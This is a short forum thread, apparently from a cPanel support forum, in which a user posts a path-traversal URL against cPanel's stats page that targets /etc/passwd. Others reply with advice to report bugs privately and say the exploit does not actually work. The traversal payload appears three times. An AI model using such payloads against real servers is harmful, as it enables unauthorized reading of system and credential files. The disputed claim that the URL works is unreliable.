LinkBack URL
About LinkBacksthedomain.com:2082/frontend/x2/stats/lastvisit.html?domain=../../../../../../../../etc/passwd
with this command, a reguler user can read /etc/passwd
Bugs Cpanel
thedomain.com:2082/frontend/x2/stats/lastvisit.html?domain=../../../../../../../../etc/passwd
with this command, a reguler user can read /etc/passwd
Please read this topic: http://forums.cpanel.net/f7/security-issue-123005.html
Search before open a topic (double) and when you have find a bug don't post it in a public forum contact cPanel true a ticket to inform them. It's all for yours and ours security.
Actually, it wouldn't hurt to investigate a little to know whatOriginally Posted by capoeng2004
thedomain.com:2082/frontend/x2/stats/lastvisit.html?domain=../../../../../../../../etc/passwd
with this command, a reguler user can read /etc/passwd
you are talking about before opening your mouth too.
FYI: The old wannabe exploit you listed doesn't actually show /etc/passwd
(Stop and think about it for a few minutes and you'll figure it out)
